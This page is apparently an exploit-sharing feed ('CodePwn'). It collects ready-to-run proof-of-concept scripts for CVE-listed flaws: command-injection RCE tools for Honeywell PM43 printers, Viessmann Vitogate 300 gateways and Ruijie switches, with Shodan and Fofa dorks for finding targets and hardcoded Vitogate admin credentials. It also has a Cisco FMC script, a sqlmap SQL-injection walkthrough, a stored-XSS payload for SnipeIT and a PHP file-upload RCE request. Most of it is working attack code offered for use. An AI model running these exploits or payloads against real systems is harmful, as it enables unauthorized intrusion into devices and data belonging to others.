Latest exploits :: CodePwn

<pre><code>#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) #- Shodan Dork: http.title:PM43 , PM43 #- Exploit Author: ByteHunter #- Email: 0xByteHunter@proton.me #- Frimware Version: versions prior to P10.19.050004 #- Tested on: P10.17.019667 #- CVE : CVE-2023-3710 import requests import argparse BLUE = '\033[94m' YELLOW = '\033[93m' RESET = '\033[0m' def banner(): banner = """ ╔════════════════════════════════════════════════╗ CVE-2023-3710 Command Injection in Honeywell PM43 Printers Author: ByteHunter ╚════════════════════════════════════════════════╝ """ print(YELLOW + banner + RESET) def run_command(url, command): full_url = f"{url}/loadfile.lp?pageid=Configure" payload = { 'username': f'hunt\n{command}\n', 'userpassword': 'admin12345admin!!' } try: response = requests.post(full_url, data=payload, verify=False) response_text = response.text html_start_index = response_text.find('<html>') if html_start_index != -1: return response_text[:html_start_index] else: return response_text except requests.exceptions.RequestException as e: return f"Error: {e}" def main(): parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers') parser.add_argument('--url', dest='url', help='Target URL', required=True) parser.add_argument('--run', dest='command', help='Command to execute', required=True) args = parser.parse_args() response = run_command(args.url, args.command) print(f"{BLUE}{response}{RESET}") if __name__ == "__main__": banner() main() </code></pre>

<pre><code>#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE) #- Shodan Dork: http.title:'Vitogate 300' #- Exploit Author: ByteHunter #- Email: 0xByteHunter@proton.me #- Version: versions up to 2.1.3.0 #- Tested on: 2.1.1.0 #- CVE : CVE-2023-5702 & CVE-2023-5222 import argparse import requests def banner(): banner = """ ╔═══════════════════════════════════╗ CVE-2023-5702 Vitogate 300 RCE Author: ByteHunter ╚═══════════════════════════════════╝ """ print(banner) def send_post_request(target_ip, command, target_port): payload = { "method": "put", "form": "form-4-7", "session": "", "params": { "ipaddr": f"1;{command}" } } headers = { "Host": target_ip, "Content-Length": str(len(str(payload))), "Content-Type": "application/json" } url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi" response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("Result:") print(response.text) else: print(f"Request failed! status code: {response.status_code}") def main(): parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials") parser.add_argument("--target", required=False, help="Target IP address") parser.add_argument("--port", required=False, help="Target port",default="80") parser.add_argument("--command", required=False, help="Command") parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials") args = parser.parse_args() if args.creds: print("Vitogate 300 hardcoded administrative accounts credentials") print("Username: vitomaster, Password: viessmann1917") print("Username: vitogate, Password: viessmann") else: target_ip = args.target target_port = args.port command = args.command if not (target_ip and command): print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.") return send_post_request(target_ip, command,target_port) if __name__ == "__main__": banner() main() </code></pre>

<pre><code>#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) #- Shodan Dork: http.html_hash:-1402735717 #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif" #- Exploit Author: ByteHunter #- Email: 0xByteHunter@proton.me #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293) #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293) import http.client import argparse def send_request(ip, port, command): headers = { "Host": f"{ip}:{port}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cmdnum": "1", "Confirm1": "n", "Content-Length": "0", "Command1": command } try: connection = http.client.HTTPConnection(f"{ip}:{port}") connection.request("GET", "/EXCU_SHELL", headers=headers) response = connection.getresponse() print(f"Status Code: {response.status}") print(response.read().decode('utf-8')) connection.close() except Exception as e: print(f"Request failed: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE') parser.add_argument('--ip', help='Target IP address', required=True) parser.add_argument('--port', help='Port', required=True) parser.add_argument('--cmd', help='Command', required=True) args = parser.parse_args() ip = args.ip port = args.port command = args.cmd send_request(ip, port, command) </code></pre>

<pre><code>+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 + **Date:** 2023-26-12 + **Exploit Author:** Hamdi Sevben + **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ + **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip + **Version:** 1.0 + **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 + **CVE:** CVE-2023-7137 ## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140 + https://www.cve.org/CVERecord?id=CVE-2023-7137 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 + https://nvd.nist.gov/vuln/detail/CVE-2023-7137 ## Description: Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database. ## Proof of Concept: + Go to the User Login page: "http://localhost/clientdetails/" + Fill email and password. + Intercept the request via Burp Suite and send to Repeater. + Copy and paste the request to a "r.txt" file. + Captured Burp request: ``` POST /clientdetails/ HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 317 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/clientdetails/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 uemail=user@mail.com&login=LOG+IN&password=P@ass123 ``` + Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. ``` python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db ``` ``` --- Parameter: uemail (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123 --- [14:58:11] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.53, PHP, PHP 8.1.6 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [14:58:11] [INFO] fetching current database current database: 'loginsystem' ``` + current database: `loginsystem` ![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a) </code></pre>

<pre><code># Exploit Title: [Cisco Firepower Management Center] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [6.2.3.18", "6.4.0.16", "6.6.7.1] # CVE : [CVE-2023-20048] import requests import json # set the variables for the URL, username, and password for the FMC web services interface fmc_url = "https://fmc.example.com" fmc_user = "admin" fmc_pass = "cisco123" # create a requests session to handle cookies and certificate verification session = requests.Session() session.verify = False # send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken" response = session.post(token_url, auth=(fmc_user, fmc_pass)) # check the response status and extract the access token and refresh token from the response headers # set the access token as the authorization header for the subsequent requests try: if response.status_code == 200: access_token = response.headers["X-auth-access-token"] refresh_token = response.headers["X-auth-refresh-token"] session.headers["Authorization"] = access_token else: print("Failed to get tokens, status code: " + str(response.status_code)) exit() except Exception as e: print(e) exit() # set the variable for the domain id # change this to your domain id domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f" # send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords" response = session.get(devices_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to get devices, status code: " + str(response.status_code)) exit() except Exception as e: print(e) exit() # parse the data to get the list of device names and URLs devices = [] for item in data["items"]: device_name = item["name"] device_url = item["links"]["self"] devices.append((device_name, device_url)) # loop through the list of devices and send a GET request to the URL of each device to get the device details for device in devices: device_name, device_url = device response = session.get(device_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to get device details, status code: " + str(response.status_code)) continue except Exception as e: print(e) continue # parse the data to get the device type, software version, and configuration URL device_type = data["type"] device_version = data["metadata"]["softwareVersion"] config_url = data["metadata"]["configURL"] # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability # use the values from the affected products section in the security advisory if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]: print("Device " + device_name + " is vulnerable to CVE-2023-20048") # create a list of commands that you want to execute on the device commands = ["show version", "show running-config", "show interfaces"] device_id = device_url.split("/")[-1] # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute for command in commands: command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command response = session.post(command_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to execute command, status code: " + str(response.status_code)) continue except Exception as e: print(e) continue # parse the data to get the result of the command execution and print it result = data["result"] print("Command: " + command) print("Result: " + result) else: print("Device " + device_name + " is not vulnerable to CVE-2023-20048") </code></pre>

<pre><code>Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting Date: 06-Oct-2023 Exploit Author: Shahzaib Ali Khan Vendor Homepage: https://snipeitapp.com Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1 Version: 6.2.1 Tested on: Windows 11 22H2 and Ubuntu 20.04 CVE: CVE-2023-5452 Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting (XSS) feature that allows attackers to execute JavaScript commands. The location endpoint was vulnerable. Steps to Reproduce: 1. Login as a standard user [non-admin] > Asset page > List All 2. Click to open any asset > Edit Asset 3. Create new location and add the payload: <script>alert(document.cookie)</script> 4. Now login to any other non-admin or admin > Asset page > List All 5. Open the same asset of which you can change the location and the payload will get executed. POC Request: POST /api/v1/locations HTTP/1.1 Host: localhost Content-Length: 118 Accept: */* X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Referer: http://localhost/hardware/196/edit Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO; assetsListingTable.bs.table.cardView=false; laravel_token= eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3 ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0 01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D; XSRF-TOKEN= eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5 MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D Connection: close name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country= Thanks, Shahzaib Ali Khan </code></pre>

<pre><code>## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using ## Author: nu11secur1ty ## Date: 03/13/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html ## Reference: https://portswigger.net/web-security/file-upload ## Description: The upload function and id=cimg parameter are not sanitizing correctly! The attacker can upload any PHP file which he can execute directly on the server! STATUS: HIGH-CrITICAL Vulnerability [+]Payload: ```POST POST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 6318 sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypV7nBYU4nAonvWel X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/mobile_store/admin/?page=system_info Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dg Connection: close ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="name" Mobile Store Management System - PHP ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="short_name" MSMS-PHP ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="about_us" margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us<hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);"></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);"></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px; text-align: center; background-color: rgb(255, 255, 255);"><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div>margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Praesent eleifend interdum est, at gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula, aliquam purus quis, pharetra lorem.<p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Proin consectetur massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula tellus eleifend sit amet.margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id ante vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id ultricies mollis, lectus velit viverra mi, at venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec volutpat tincidunt.<p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque mauris. Quisque sit amet varius augue.margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quis imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean neque sapien, volutpat a ullamcorper nec, iaculis quis est. ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="privacy_policy" Sample Privacy Policy ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="img"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="cover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarypV7nBYU4nAonvWel Content-Disposition: form-data; name="banners[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarypV7nBYU4nAonvWel-- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html) ## Time spent: 00:05:00 </code></pre>